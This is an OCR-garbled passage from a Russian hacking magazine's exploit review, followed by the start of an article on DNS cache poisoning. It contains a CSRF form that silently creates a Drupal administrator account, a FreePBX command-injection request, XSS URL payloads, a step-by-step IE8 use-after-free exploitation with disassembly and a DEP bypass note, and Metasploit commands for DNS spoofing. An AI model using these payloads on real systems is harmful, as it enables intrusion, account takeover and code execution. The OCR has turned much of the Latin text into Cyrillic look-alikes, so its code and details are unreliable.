•еРогт те1:I^осI= ,, Р05Т ,, пате="-Рогт0" 

асііоп="ІтЫ:р : 7/<с1гира1_ір> : БѲ/сІгираІ/асІтіп/реорІе/сгеаіе? 
пепсІег=оѵег1ау&пепсІеп=оѵеп1ау ,, > 

<іприі 1:уре="ИісІсІеп" пате="пате" 
ѵ а 1 и е = " п ем_а сі т і п "/> 
сіприі 1:у ре= " Иі^ІсІеп " пате="таі1" 
ѵа1ие="пеы_а сІтіп(а)пеы_асІпі іп . сот"/> 

<іпри1: іуре="НісІсІеп" пате="ра55[ра55І] " 
ѵа1ие="пеш_ра5 5шогсГ 7> 

< іприі: 1:уре= ,, ИісІсІеп" пате="раз5[ра552] " 
ѵа1ие="пем_ра55могсГ/> 

<іпри1: Іуре^'ІіісІсІеп" пате^'зіаіиз" ѵа1ие="1"/> 

<іпри1: іуре="ІіісІсІеп" пате="го1ез[3] " ѵа1ие="3"/> 

<іпри1: 1:уре=" Ріісісіеп " пате=" 1 :іте 20 пе" 
ѵа1ие="Еигоре/Рга%ие"/> 

< іприі: іуре^'і'іісісіеп" пате="-Ропт_Ьиі1сІ_ісІ" 

ѵа1ие="-Рогт-оІІкЬ0У0ду2а§-иіУРНѵ1РХМ1п320НСз1НозоІі_Іі53рУ , 7> 
<іприі 1:уре= " Иісісіеп " пате^'іопгМюкеп" 

ѵа1ие="си7пт1рІлІи-а4ЦК6РРВсѴіЕи1=^ѵоЕісН : К12^0НРА1=Хс , 7> 
<іпри1: 1:уре= " Иісісіеп " пате="-Рогт ісі" 
ѵа1ие="и5ег_ге^і5І:ег_-Рогт , 7> 

<іприі іуре=" Місісіеп" пате="ор" 
ѵаІие^ІСгеаіе пеы ассоипі'7> 

</-Ропт> 

< /Ь осІу> 

</И1:т1> 

Для логаута пользователя из системы: 

< Иііті > 

< Ьосіу опіоасі^'даѵазсгірі: : сіоситепі .іогтз [0] . зиЬтііО'^ 
<Н2>С5КР Ехріоіі: іо 1о§оиі АсІтіп</Н2> 

<-Рогт теіІпосІ="Р05Т" пате="-РогтѲ" 

асііоп="Іііір: 7/<сІгира1_ір> :8Ѳ/сІгира1/и5еі71о§оиі"> 
</іогт> 

</ЬосІу> 

</Іііт1> 



ТАК6ЕТ5 



ОгираІ 7.12 и более ранние версии. 



боіллісж 



От разработчиков исправлений пока не поступало, рекомендуется 
обезопасить трафик при помощи НТТР5 и использовать соответ- 
ствующее АРІ для защиты от Х55. 



3 



Множественные уязвимости в РгееРВХ 



СѴ55Ѵ2 



7.5 



(АѴ:М/АС:І_/Аи:М/С:Р/І:Р/А:Р) 

шшэ 

РгееРВХ — это веб-интерфейс для конфигурации компьютерной 
телефонии Азіегіак, который является довольно распространенным 
решением (около 500 000 активных устройств по всему миру). Часть 
этих систем имеет внешние ІР-адреса, что требует дополнительного 
внимания к безопасности системы. Однако в середине марта иссле- 
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Обзор эксплойтов 
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тоѵ 
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.Цѵ<:М63ЧЧАЗЬЬ 




ри-^Рі 
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І1 


5»и>г1 ьас бздд-АЗЕа 



[есх+есіх*4] или[еах+есх*4] возможно уже под кол паком 



довательМагІіпТзсЫгзісЬ обнаружил там очень досадные баги, в их 
числе Х55 и удаленное выполнение кода. 



ЕХРЮІТ 



Выполнение произвольного кода возможно в данном случае из-за 
недостаточной фильтрации передаваемых пользователем данных 
в скрипте ЬЫос5/гесогбіпд5/тІ5с/саІІте_раде.рЬр: 



// строки 28-30: 





= $_КЕОІ)Е5Т[ 1 саіішепит 1 ] ; // ѵиІпегаЬІе 


$т5^Ргот 


= $ КЕОЦЕБТЕ'тБеРгот']; 


$пем_ра1іЬ 


= БиЬзіг ($раіІі і -4); 


// строка 


38: 



$са11_5І:а1:и5 = са11те_5±агі:са11($1:о л $т5§Ргоггь $пем_ра1:Іі) ; 



Функция саІІте_5ІагІсаІІ, задействованная вэтом коде, находит- 
ся в файле ЫсІосз/гесогсІіпдз/іпсІисІез/саІІте.рЬр: 

// строки 88-117: 

-Рипсіііоп са11те_5Ііаг1іса11($1іо. $-Ргот, $пеы_ра1:б) { 
еІоЬа! $а 5Іітап; 

$сбаппе1 = "І_оса1/$1іо () ■Ргот^іпііегпаі/п" ; / / ѵиІпегаЬІе 
$сопі:ех1і = " ѵт-са ііте" ; 

$ех1іеп5Іоп = "б"; 

$ргіогі1іу = "1"; 

$са11егісІ = "ѴМАІІ_/$-Ргот" ; 



/* Аг^итепІіБ Ііо Огі^іпаііе: сЬаппеІ. ехіеп5Іоп. сопіехіі. 
ргіогіііу. іітеоиіі. саііегісі. ѵагіаЬІе. ассоипі. 

арріісаіііоп . сіаііа */ 

$5Ііа1іи5 ^$а5Іітап->0гі§іпа1іе($сЬаппе1, $ех1іеп5Іоп, 
$соп±ех±, $ргіогі1:у, І\ІШ_І_., $са11егісІ., $ѵагіаЬ1е^ 
мши ІЧЦЦ.. ІУШЫ.. ІМШ.П ; 

п 

Таким образом имеем возможность выполнить произвольный код 
с помощью такого запроса: 

[Н0$Т]/гесогсІіп^5/тІ5с/са11те_ра^е. рЬр?асі:іоп=с&са11тепит 
= [РНОМЕМІІМВЕК](а)-Ргот-іп1=егпа1/п%0Р%ѲААрр1іса1=іоп:%2Ѳ 
бу 5І:ет%0Р%0АРа1=а : %20 [ СМР ] %ѲР%0А%0Р%0А 



Здесь: 

• Н05Т — хост, на котором находится РгееРВХ; 

• РНОМЕІМІІМВЕР — телефонный номер; 

• СМй — команда для выполнения. 

Стоитотметить, чтоуже существует модуль к Меіазріоіі, чтоупро- 
щает эксплуатацию данной баги. Уязвимости типа Х55 существуют 
в РгееРВХ 2.9.0 и, возможно, в более ранних, вот примеры их экс- 
плуатации: 

[Н05Т]/рапе1/іпсІех_атр. рЬр?соп1іех1і=[Х55] 
[Н05Т]/рапе1/Р1а5Ь/тура§е.рЬр?сПсІ=[Х55] 

[Н0$Т]/рапе1/Ла5Іі/тѵра^е.рІір?с1ісІпате=[Ьа5е64_епсосІе('Х5$’) ] 
[НО$Т]/рапе1/сІІт1=т1/іпсІех. рбр?соп1=ех1==/. . /%00">[Х55] 
[Н0$Т]/асІтіп/ѵіеы5/-РгеерЬх_ге1оасІ. рб р /"</5сгір1:>[Х$$] 
[НОЗТІ/гесогсІіп^Б/іпсІех.рІірРІОЕгіп^ >[Х55] 



ТАР6ЕТ5 



РгееРВХ 2.1 0.0, 2.9.0 и, возможно, более ранние версии. 



50ЮТІ0Ы 



Автор уязвимостей не раз связывался с вендором, предоставлял 
детальное описание проблем и даже патчи к ним. Но производитель 
таки не выпустил обновлений, закрывающих да иные баги. Поэтому 
в итоге было принято решение выложить их в пабл и к— возможно, 
это как-то мотивируетвендора. 

м М510-002 Уязвимость типа изе-аКеіМгее 
** вІпІегпеІЕхрІогег 



СѴ55Ѵ2 9.3 



(АѴ:М/АС:М/Аи:І\І/С:С/І:С/А:С) 

М:1Ы^ 

В марте на всем известном соревновании Рѵѵп20ѵѵп в одном из за- 
даний фигурировалауязвимостьСѴЕ-2010-0248, найденная в этом 
году Питером Врегденхилом (РеІегѴгеидсІепЫІ) в Іпіегпеі ЕхрІогег8. 
Уязвимость представляет собой классическую «изе-аИег-Ітее». РОС 
для этой баги выглядитследующим образом: 

<ІтЬт1><Неасі><5сгір1:> 

-Рипсіііоп БІіагІіО { 
ѵаг ТаЬІеСІопе^ 

сіоситепі .§е1іЕ1етеп1іВуІсІ( ЧаЫеісІ 1 ) . с1опеІ\ІосІе(1) ; 
ѵаг ТаЫеСеІШгпБ = ТаЫеСІопе.сеІІБ.игпБр ’а' ) ; 
ѵаг ТаЫеСеІІІІппБТа^Б = ТаЫеСеІІІІппБ .іа^зС ' а ' ) ; 
ТаЬІеСІопе.оиІіегТехІ: = 'а': 

Кезиііі = ТаЬІеСІопе. сеііз; 

Кезиііі = ТаЫеСе111Ігп5Та§5 . 11:ет( -1)^ 

} 

</5сгірі></ІіеасІ> 

<ЬосІѵ опІоасІ="ыіпсІоы. 5е1:Тітеои1:($1:ап1: ЛѲѲѴ. " ісі="Ьосіѵісі"> 
<1:аЫе ісІ="1іаЫ еісІ"> 

<1:г><1=И ісі="1:Ріісі"></1=іп></1=г> 

<1=г ісі^ЛгісГЛкісі ісі= ,, 1:сіісі ,, ></1:сі></1:г> 

</1=аЫе> 

</ЬосІу> 

</И1:т1> 



ЕХРЮІТ 



И если уж мы осмелимся запустить данный РОС в Іпіегпеі Ехріогег 8, 
да с включенным радеЬеар, то сможем пронаблюдать за следующим 
вопиющим падением: 

еах=05а42-Ра0 еЬх=061-Рс-РсІ8 есх=00000001 
есІх=06Ь54-Р-Рс езі=00000168 есІі=061-Рс-РсІ8 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



еір=639910с7 е5р=03е1Т5Ь8 еЬр=03е1Т5е0 
іор1=0 пѵ ир еі рі пі па ре пс 
С5=001Ь 55=0023 СІ5=0023 Ѳ5=0023 

-Р5=003Ь §5=0000 еЯ=00Ѳ1020б 

т5біт1!СТаЬ1еСе1І5Со11есііопСасІіеІіет: : СеіІ\Іех1:+0х12 : 

639910С7 ЗЬ4854 стр есх., сімогсі ріі г [е ах+541і] 

сІ5 :0023 :05а42-РТ4=? ??????? 



Код в дельта-окрестности места падения выглядитследующим 
образом: 



.іех1::63991ѲВА тоѵ еах, [есІі+0СІі] 



. іехі : 639910ВР 


іпс 


сіыопсі ріг [есІі+206] 


.1=ех1=:б39910СѲ 


1=е5І: 


еах., еах 


.1=ех1=:б3991ѲС2 




5богі Іос 63991ѲР4 


.іехі:639910С4 


тоѵ 


есх. [есІі+4] 


.іехі:639910С7 


стр 


есх., [еах+546] 


.іехі:639910СА 


3§е 


5богі Іос 63991004 



Судя по всему, [есІі+С] содержит объект, который был освобожден, 
но в настоящий моментнектоснова пытается ссылаться на него. 
Если мы заменим освобожденную память нашими собственными 
данными, то будем иметь контроль над действием инструкции ]де 
и послеэтоготеоретически сможем добиться исполнения собствен- 
ного кода. Ксожалению, прямой взаимосвязи между освобожден- 
ным объектом и вызовом, основанным на данных, располагающихся 
в этом объекте, не существует. Однако же, если взглянуть на то, что 
бажная функция можетвернуть в качестве результата своего испол- 
нения, то мы увидим следующий код: 



.іехі : 63663А9А 


саіі 


сімогсі ріп [еах+41 


: Вызов тзбіті! 


! СТаЬ1еСе1І5Со11ес1:іопСас6еІ1:ет: : СеіІМехі : 


.іехі : 63663А90 


тоѵ 


е5І., еах 


.іехі : 63663А9Р 


стр 


е5І д есіі 


.іехі : 63663АА1 


І2 


Іос 63663В2Е 




.іехі : 63663АВ7 


тоѵ 


есх., езі 


.іехі : 63663АВ9 


ризб 


еах 


.іехі : 63663АВА 


ри5б 


[еЬр+аг§_4] 


. 1=ех1= : 63663АВР 


ри5б 


[еЬр+апд Ѳ] 


.іехі : 63663АСѲ 


саіі 


ССоІІесііопСасбе : : СеіАіотР готІМате 



Если мы контролируем результат исполнения СТаЫеСеІІзСоІІ- 
есІіопСас6еІІет::0еІІ\ІехІ, то, соответственно, мы контролируем 
регистр есх, передаваемый в следующую функцию: 



; ргіѵаііе: 5іаііс Іоп^ 5ісІса11 

ССоІІесііопСасбе: :Се1:А1:отРготІ\Іате 

аг§_0= сімогсі ріг 8 

аг§_4= сімогсі ріг 0С6 

аг§_8= Ьуіе ріг 106 

тоѵ есіі, есіі 

ріі5И еЬр 

тоѵ еЬр. еар 

ог сіыопсі рі =г [есіі]. ѲРРРРРРРР6 

ризб е5І 

ри5б 0 

тоѵ е5І. 800200036 

саіі СЕІетепі: ібеіАіотТаЬІебіпІ: 






Продолжаем контролироватьесх: 



тоѵ еЬр., езр 



ризб 




еЬх 


ри5б 


е5І 


тоѵ 


е5І. есх 


хо г 


еЬх., еЬх 


саіі 


СЕІетепІ: :Оос(ѵоісІ) 



Парам-пам-пам: 



: риЫіс: с1а55 СРос * і6І5са11 СЕІетепі: :Рос(ѵоісПсоп5І: 
тоѵ еах., [есх] 



тоѵ 


есіх., [еах+706] 


саіі 


есіх 



Мы получаем ѵИаЫе изследующейза вызовом контролируемой 
памяти. Теперь необходимо выяснить, каким образом заста вить функ- 
цию СТаЫеСеІІ5СоІІесІіопСас6еІІет::беіМехІ возвращать нечто нам 
полезное. Для этих целей мы обнаружили и использовали достижи- 
мый вызов функции СТаЫеРоѵѵСеІІ5СоІІесІіопСасЬеІІет::0еШехІ: 

1ос_639910СЕ : 

рор есіі 

Э'тр СТаЫеКоыСе1І5Со11ес1:іопСас6еІ1:ет: гбеМехі 

Если пройти по правильному пути в данной функции, то можно 
попастьсюда: 



.іехі : 6399АЗЕ8 Іос 6399АЗЕ8: 



. іехі : 6399АЗЕ8 


тоѵ 


еах. есіі 


. іехі : 6399АЗЕА 


. іехі : 6399АЗЕА 


Іос 6399АЗЕА: 


. іехі : 6399АЗЕА 


рор 


есіі 


.іехі:6399АЗЕВ 


ООО 


езі 


.іехі:6399АЗЕС 


Іеаѵе 


. іехі : 6399АЗЕО 


геіп 




Мы можем контролироватьзначениеесіі по следующему адресу: 


Іос 6399А380 : 






тоѵ 


есх., 


[еах+586] 


тоѵ 


есіх., 


[езі+186] 


тоѵ 


есх. 


[есх+0Сб] 


тоѵ 


есіі ^ 


[есх+есІх*4] 


Илиздесь: 






.1=ех1=:6399А361 


тоѵ 


еах., [еах+486] 


.іехі:6399А364 


тоѵ 


есіі. [еах+есх*4] 


.іехі:6399А367 


тоѵ 


еах., есіі 



Еслиты посмотришьна код, приведенный выше, тоувидишь, 
что, вероятно, существует возможность контроля за [есх+ебх*4] 
или [еах+есх*4]. Поадресу0х6399А320 инструкцией «тоѵ еах., 
[Ѳ5І+0С6]» мы снова получаем нашу освобожденную память. Пройдя 
далее, видим, что контролируем некоторые (но не все) данные, и в 
конце концов попадаем на следующий блок: 



.іехі:6399А361 


тоѵ 


еах. 


[еах+486] 


.1=ех1=:6399А364 


тоѵ 


есіі. 


[еах+есх*4] 


.іехі:6399А367 


тоѵ 


еах, 


есіі 


.іехі:6399А369 


саіі 


СТаЬІеСеІІ: :6еіААсо15рап(ѵоісО 



; риЫіс: ѵіпііиаі с1а55 САІіотТаЫе * і6І5са11 

СЕІетепІ:: ібеіАіотТаЫе 

а г§_0= сіыогсі ріг 8 
тоѵ есіі, есіі 

ри5б еЬр 



Посколькумы по-прежнему контролируем памятьв [еах],то, 
хотя мы и не контролируем есх(а он всегда равен 0x0), значение 
в есіі становится нам подвластно. Теперь все, что нужно сделать, 
— это сохранить работоспособность оставшейся части функции 
и убираться отсюда поскорее. Мы можем протрассировать все 
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Обзор эксплойтов 



функции, вызываемые из СТа6ІеСеІІ::СеіААсоІ5рап[ѵоіб), но по- 
скольку возвращаемые значения функций для нас не так важны, 
то будет достаточно просто заполнить наш второй объект последо- 
вательностью МІІИ'ов. Немного позже мы этим и займемся, чтобы 
достичь реального исполнения кода. В конце концов мы добрались 
до СЕІетепІ::Оос(ѵоіб) с есх, указывающим на наш второй поддель- 
ный объект. Итак, нас озарило понимание того, что данный экс- 
плойт можно поставить на рельсы разрушения путем связывания 
воедино правильных объектов. Первый эксплойт на эту уязвимость, 
который был написан еще в 2010 году, просто использовал технику 
беарзргау. Здесь же будет предложен способ без него. В прошлом 
годуна Рѵѵп20ѵѵп Зіербеп Реѵѵег использовал интересный багтипа 
теплоту бізсіозиге в ІЕ, чтобы получить некоторую информацию 
о состоянии программы. 

Код, который был им задействован, выглядитследующим об- 
разом: 

ѵаг 1:61 = боситеп1:.сгеа1:еЕ1етеп1:( ’орііоп ’ ) .іпбех; 

Это дает нам указатель на таблицу глобальных переменных 
в Іпіегпеі Ехріогег, которая выглядит как-то так: 



1:Ѳ23> сіс ѲѲЗССІ818 І_8 

003ССІ818 00000082 00000000 03896600 003с3930 к..09<. 

003ССІ828 00000087 003ССІ008 00188420 0000047-Р .< 

1 : 025 > сіс 03896600 



03896600 0070006-Р 00690074 ѲѲбеѲѲб-р 00000000 о.р.і.і.о.п 

Таким образом, размер каждого элемента составляет 16 байт 
и среди этих 16 байт содержится указатель на реальную переменную. 
Путем использования 

ѵаг а = "наши данные" 

в сочетании с ба гой типа тетогу бізсіозиге мы можем узнать 
адрес в памяти, где будет находиться указатель на нашиданные. 
Таким образом, у нас не будет фактического адреса, но он нам в этом 
случае и не нужен. Ранее мы разыменовывали наш освобожденный 
объект дважды, чтобы он указывал на следующий объект: 

.1:ех1=:б399АЗб1 шоу еах. [еах+486] 

.1:ех1::б399АЗб4 шоу ебі. [еах+есх*4] 

Мы можем просто поместить в [еах+48] правильный адрес вта- 
блице глобальных переменных, и это приведет к тому, что весіі будет 
содержатьсяуказатель на память, которую мы контролируем. Чтобы 
найти это правильное смещение в таблице глобальных переменных, 
использовался следующий код: 

ѵаг 1:61 = боситеп1:.сгеа1:еЕ1етеп1:( ’орііоп' ). іпсіех; 

Маіб . а1:ап2(0хбабе, 

("іабіе аі : " + 1=61.1=о$1=гіп^(16^ .1=о$1=піп^П ); 

В совокупности с ѵѵіпббд-брей кпоинтам и и скриптами: 

би з’зсгірі: ! ЗзА1;ап2 ".ргіпі-р \"%ти\", 
роі(роі(роі(езр+14)+8)+8); .есбо;§" 

.Тог (г @$ТѲ = 0; @$±Ѳ < 0x30; г @$Т0 = @$Т0 + 1)_{ 

г (а)$1=Ѳ;сІс роі(3се340 - (0x10 * (Э$1=Ѳ) + 8Ѵ. 

Ь_ 

3десь0х3се340 — адрес таблицы, который удалось получить 
черезутечку памяти. 

Приведенный выше скрипт выводит все глобальные переменные 
втаблице. В нашем случае оЬ;_іѵѵо располагается на 0x2а объекта 
перед таблицейіЫ. Поэтому если мы выделим нашу освобожденную 
памятьтаким образом, что«тоѵ еах, [еах+486]» возвратитвтабли- 



цу глобальных переменных адрес, указывающий на нашу строку, то 
«тоѵ ебі, [еах+есх*4]» позволит нам убедиться, что мы контроли- 
руем память, на которуюуказываетесіі. 

Вернемся назад и затем в функцию СЕІетепі:: Оос(ѵоісІ]: 



ьзьзтсс4 8001 тоѵ еах,амога риг [есх; 

; бз: 0023: 00166134=42424242 


6363-Рссб 865070 


тоѵ 


ебх.бмогб 


ріг 


[еах+706] 


: б з : 0023:42424262=?? ?????? 






За этим следует: 










6363-Рсс9 -Р-Р62 


саІІ 


ебх 







Таким образом удалось доказать, что мы можем достичь блока 
кода, который позволит контролировать поток исполнения. Итак, 
что же делать дальше? Мы контролируем [есх], который, в свою 
очередь, позволяетнам контролировать еах, но втоже время 
не можем повторно использовать недавний трюк с гл оба л ины- 
ми переменны ми, поскольку результатом его будет передача 
управления в кучу. Однако мы контролируем [есх] и [езі], и этот 
фа кт заставляет нас несколько призадуматься... В большинстве 
функций есх используется какуказательібіз. Если мы сможем 
найти функцию в б II, которая делает двойное разыменование из 
есх и затем использует результат в качестве адреса, по которому 
будетосуществляться са 1 1, то мы сможем использовать другую 
глобальную переменную, чтобы получить полный контроль над 
потоком управления. Однакодля этого нам потребуется указатель 
на такую функцию, располагающийся по определенному адресу. 
Решение: взять сП 1-файл (можно начатьс]зсгірСбІІ), получить список 
всех указателей на функции внутри файла и проанализировать каж- 
дую из них на наличие двойного разыменования из есх, за которым 
должен следоватьвызов. При помощи самописных ЮА-скриптов 
можно обнаружить подобную функцию: 



.1=ехі::6340Е030 ; 


рибііс : 


ѵігіиаі Іопе Іібізсаіі 


ОбіЕѵіНапбІег : 


: : КезеІіСѵоіб’) 


.іехі : 6340Е030 


тоѵ 


ебі, ебі 


.іехі : 6340Е032 


ризб 


езі 


.1=ех1=:6340Е033 


тоѵ 


езі. есх 


.іехі::634ѲЕ035 


тоѵ 


еах. [езі+146] 


.іехі::634ѲЕ038 


і=е5І= 


еах, еах 


.іехі : 6340Е03А 


12 


збогі Іос 6340Е04В 


.іехі : 6340Е03С 


тоѵ 


есх, [еах] 


.іехі : 6340Е03Е 


тоѵ 


ебх, Десх+8] 


.1=ех1=:б34ѲЕѲ41 


ризб 


еах 


.1=ех1=:634ѲЕѲ42 


саІІ 





Мы контролируем есхи, какследствие, контролируем езі. Если 
установить в [езі+14] адрес другой глобальной переменной, после 
«тоѵ есх, [еах]» есх будетуказывать на контролируемую нами 
память. После чего «тоѵ ебх, [есх+8]» позволит нам задать в ебх 
любоезначение, какое мытолько пожелаем, и, соответственно, 
последующий вызов саІІ ебх будет непосредственно контроли- 
роваться нами. Все, что нам при этом нужно, — это в функции 
СЕІетепІ::Оос(ѵоіб) положить в [есх] адресуказателя на функцию 
Об]ЕѵЖапбІег::РезеІ (за вычетом 0x70). 

Осталось всего ничего — обойти йЕР, и дело в шляпе :). Для этого 
можно использовать, к примеру, технику, описанную Спенсером В. 
Праттом (Зрепсег ѴѴ Ргаи) изаключающуюся в перезаписи части 
кода ѴѴгбеРгосеззМетогу собственным шелл -кодом. 



ТАК6ЕТ5 



I Е 8 на ѴѴіпсІоѵѵз ХР 5РЗ, ІЕ8 на ѴѴіпбоѵѵз 7 5Р1 



50ИЛКЖ 



Существует обновление, устраняющее да иную уязвимость. ШИ 
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6Н05Т ООМАШ ЫАМЕ5 И ДРУГИЕ (ЮАѴ-СПОСОБЫ 
ВЗЛОМА СИСТЕМЫ ДОМЕННЫХ ИМЕН 



РЫБ — это святая святых Сети. Сейчас уже трудно представить интернет без этой технологии, настолько 
прочно вошедшей в нашу жизнь, что малейшая уязвимость в ее работе влечет за собой огромные 
проблемы. Сегодня мы с тобой как раз и рассмотрим новейшие методы реализации РЫБ-атак. 



Идея запоминать ІР-адреса для всех веб-ресурсов лишена 
всякого смысла. А еще лет двадцать назад, когда Сеть только за- 
рождалась, это было в порядке вещей. С увеличением числа хо- 
стов (компьютеров и другого сетевого оборудования) пришлось 
как-то выходить из положения. Первоначально преобразование 
доменных имен в ІР-адреса происходило с помощью специ- 
ального файла Ьозіз (да-да, того самого Ьобіб, благополучно 
дошедшего до наших дней и так часто используемого всякими 
вредоносными программами). В то время данный файл состав- 
лялся централизованно и обновлялся на каждой из машин сети 
вручную. На смену этой неудобной и немасштабируемой системе 
пришла автоматизированная распределенная система доменных 
имен ака 0І\І5. 



ПРИНЦИП РАБОТЫ 

Давай быстренько пробежимся по матчасти, ибо базовые понятия 
о принципах функционирования 0І\І5 ты все-таки обязан знать. 
Итак, 0ІМ5 (Оотаіп ІМате Вузіет) — это распределенная система 
преобразования имен хостов в ІР-адреса. 0І\І5 обладает следую- 
щими характеристиками: 

1. Распределенностьхранения информации. 

Каждый узел сети в обязательном порядке должен хранить толь- 
ко те данные, которые входят в та к назы ваемую зону ответствен- 
ности, и иногда, возможно, адреса корневых 0І\І5-серверов. 

2. Кешированиеинформации. 

Узел может хранить некоторое количество данных не из своей 
зоны ответственности для уменьшен ия нагрузки на сеть (из-за 
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Атаки на 0145: вчера, сегодня, завтра 



этой характеристики у 0ІМ5 довольно крупные проблемы с безо- 
пасностью). 

3. Иерархическая структура. 

Все узлы объединены в виде дерева, и каждый узел может или 
самостоятельно определять работу нижестоящих узлов, или же 
передавать (делегировать) их другим узлам. 

4. Резервирование. 

Сохранность да иных и продолжение работы даже в случае сбоя 
одного изузлов. 

0І\І5-система содержит иерархию 0І\І5-серверов, которая соот- 
ветствует иерархии зон. Каждая из зон поддерживается как минимум 
одним авторитетным сервером 0І\І5, где расположена информация 
о домене. 

Так как имя и ІР-адрес являются нетождественными, то один 
ІР-адрес может иметь множество имен, что позволяет поддерживать 
на одном компьютере множество веб-сайтов (виртуальный хостинг). 
Существует также и обратный процесс, когда одному имени может 
быть сопоставлено множество ІР-адресов. Это позволяет создавать 
балансировку нагрузки для посещаемых веб-ресурсов. 

Теперь давай рассмотрим на реальном примере работу всей 
этой системы. Когда мы набираем адрес ѵѵѵѵѵѵ.хакер.ги. наш браузер 
спрашиваету ближайшего РЫЗ-сервера ІР-адрес запрошенного сайта. 
Если сервер находиту себя запись об ІР-адресе ѵѵѵѵѵѵ.хакер.ги. то он 
возвращает нам ее значение. Если запись отсутствует, ближайший 
РІМ5 начинает спрашивать ІР-адрес у своего авторитетного 0І\І5: при 
удаче к нам возвращается нужный ІР, а в случае неудачи авторитетный 
сервер отправляет запрос к РЫЗ-серверу, ответственному уже за всю 
за доменную зону РІІ. Таким образом, к нам по цепочке возвращается 
ІР-адрес запрошенного сайта, при этом каждый из РЫЗ-серверов, 
на котором не была найдена эта запись, пытается записать получен- 
ную информацию в свой кеш для ускорения ответов при повторном 
обращении клиентов. Время жизни хранения ответов в кеше приходит 
вместе с ними в поле ТТІ_ (Тіте Іо І_іѵе) рекурсивной записи. Записи 
в 0І\І5 (они же ресурсные записи, РР) — это единицы хранения и пере- 
дачи информации в 0І\І5. Каждая РР состоит из следующих полей: 

• МАМЕ — доменное имя, которому принадлежит данная ресурсная 
запись; 

• ТТІ_ — времяхраненияданной ресурснойзаписи в кеше«неответ- 
ственного» 0І\І5-сервера; 

• ТУРЕ — определяет формат и назначение данной ресурснойзаписи; 

• СІ.А55 — поле, определяющеетип сети; 

• Р01_ЕЫ — длина поляданных; 

• ВРАТА — поледанных. 



ВОЗМОЖНЫЕ УЯЗВИМОСТИ 

Для ответов на запросы протокол 0І\І5 использует ТСР- или ІЮР- 
порт 53. Обычно запросы и ответы отправляются в виде одной ІЮР- 
датаграммы. ТСР используется в случае, если ответ больше 512 байт 




Схема проведения атаки на 0МБ при помощи ботнета 





ШВЫІЫС 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



Создаем домен для теста 



(а также в случае АХРР-запроса, но это бывает очень редко). На 
самом деле протокол ІЮР был использован в качестве основного 
протокола обмена информацией между 0І\І5-серверами ввиду его 
более скоростной работы по сравнению с тем же ТСР. Но, как ты 
знаешь, ничего в этом мире не дается просто так. За так называе- 
мую скорость нужно платить, а платить пришлось безопасностью. 
Это первый фундаментальный баг, который является ахиллесовой 
пятой всех 0І\І5-систем. 

Вторая багофича 0І\І5-систем заключается в локальном кеше, 
который также используется для ускорения ответов. Ты сейчас уди- 
вишься и спросишь: при чем же тут кеш? А при том, что вкупе с первой 
уязвимостью существует возможность перезаписи содержимого 
в кеше 0І\І5-сервера таким образом, что машина, которая будет об- 
ращаться на «отравленный» авторитетный сервер для той или иной 
зоны 0І\І5, получит не совсем корректный ІР-адрес и обратится к не 
совсем тому веб-ресурсу, который был нужен изначально :). 

Теоретическую возможность заражения 0І\І5-кеша предсказал 
еще в 1991 году некий Крэм Грегоре, но лишь в 2008 году известный 
исследователь в области ИБ Дэн Камински представил миру свои 
практические реализации «отравления» кеша 0І\І5-серверов (после 
серии атак, совершенных китайскими и израильскими хакерами 
в 2006 году). В том же году ребятами из группы РарісІ7 сплоиты Дэна 
были портированы в уже полюбившийся тебе Меіазріоіі Ргатеѵѵогк. 
Ты можешь попробовать их в действии (на свой страх и риск!): 

тз-Р > изе аихіІіагу/зроо^/гіпз/ЬаіІіыіскесІ 

изе аихіііагѵ/ 5рооТ/сІп5/Ьаі1іыіскесІ_сІотаіп 

изе аихі1іагу/зроо-Р/сІп5/Ьаі1іыіскесІ_Ііо5І: 

тзТ > изе аихі1іагу/зроо-Р/сІп5/Ьаі1іыіскесІ_сІотаіп 

тзТ аихі1іагу(Ьаі1іыіскесІ_сІотаіп) > збоы орѣіопз 

Кстати, начиная с 2010 года по рекомендации того же Дэна 
в систему 0І\І5 внедряются средства проверки целостности пере- 
даваемых данных, называются они 0І\І5 Зесигііу Ехіепзіопз (0ІМ55ЕС). 
Передаваемые данные не шифруются, но их достоверность уже про- 
веряется криптографическими способами. 

Ну и наконецтретья и наиболее известная уязвимость — кри- 
ворукость. Да-да, именно так :). На самом деле плохо настроенный 
и доверяющий всем и каждому 0І\І5 — это реальная угроза безопас- 
ности. Многие пытаются предотвратить атаки на кеш с помощью 
уменьшения степени доверия к информации, приходящей от других 
0І\І5-серверов, или даже игнорирования любых 0І\І5-записей, прямо 
не относящихся к запросам. Например, последние версии ВІІ\Ю (9.x. х, 
10.x) выполняюттакие проверки. Существенно снизить вероят- 
ность успешной атаки на кеш поможет использование случайных 
ІЮР-портов для выполнения 0І\І5-запросов. Но, как выясняется на 
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взлом 



практике, это довольно большая редкость, и в основном 0145-серверы 
работают с настройками по умолчанию. 




идентификатор (ХЮ) для достоверности предоставляемой инфор- 
мации просто инкрементировал свое значение. Так что угадать, 
каким будет следующий ХЮ, не составляло большого труда. С 2002 
года принцип работы немного изменился, была реализована воз- 
можность рандомизации пересылаемого идентификатора. Теперь 


РЫБ САСНЕ Р0І50И ІЫѲ ВОЗВРАЩАЕТСЯ 






Теперь давай подробно рассмотрим методы проведения атактипа 
0145 сасЬе роізопіпд. Первый вариант атаки (подмена ІР-адреса 0145- 
сервера домена жертвы) выглядит следующим образом: 

1. Запрос от 0145-сервера жертвы: какова А-запись для зиЬсІотаіп. 
аиаскег.ехатріе? 

БиЬсІотаіп.аІіІіаскег. ехатріе. ІИ А 


ХЮ каждый раз псевдослучайно генерировал 8-битный иденти- 
фикационный номер. В 2006 году китайские и израильские хакеры 
научились «угадывать» драгоценный идентификатор и успеш- 
но проводить атаки отравления кеша с помощью скоростного 
интернет-канала. С тех пор 0145-серверы рандомизируют не только 
ХЮ, но и порт, на котором они работают. Возможно, это являлось 
в какой-то мере решением всех проблем 0145, хотя, как мне кажет- 


2. Ответхакера: 
АпБыег : 




ся, поверхностные заплатки никогда не могли помочь исправлению 
чего-либо фундаментального. Далее я приведу пример атаки, кото- 
рая будет спокойно обходить такие непутевые заплатки. Поможет 
в этом предполагаемому злоумышленнику самый обычный ботнет. 


(по гезропве) 




Итак, у неких личностей есть ботнет размером в 1 100 ботов. 






Это не так уж и много, но вполне достаточно, чтобы отравить 


Аи’Ыіопі'Ьу Бесіііоп: 




0145-кеш среднего интернет-провайдера или же более-менее 

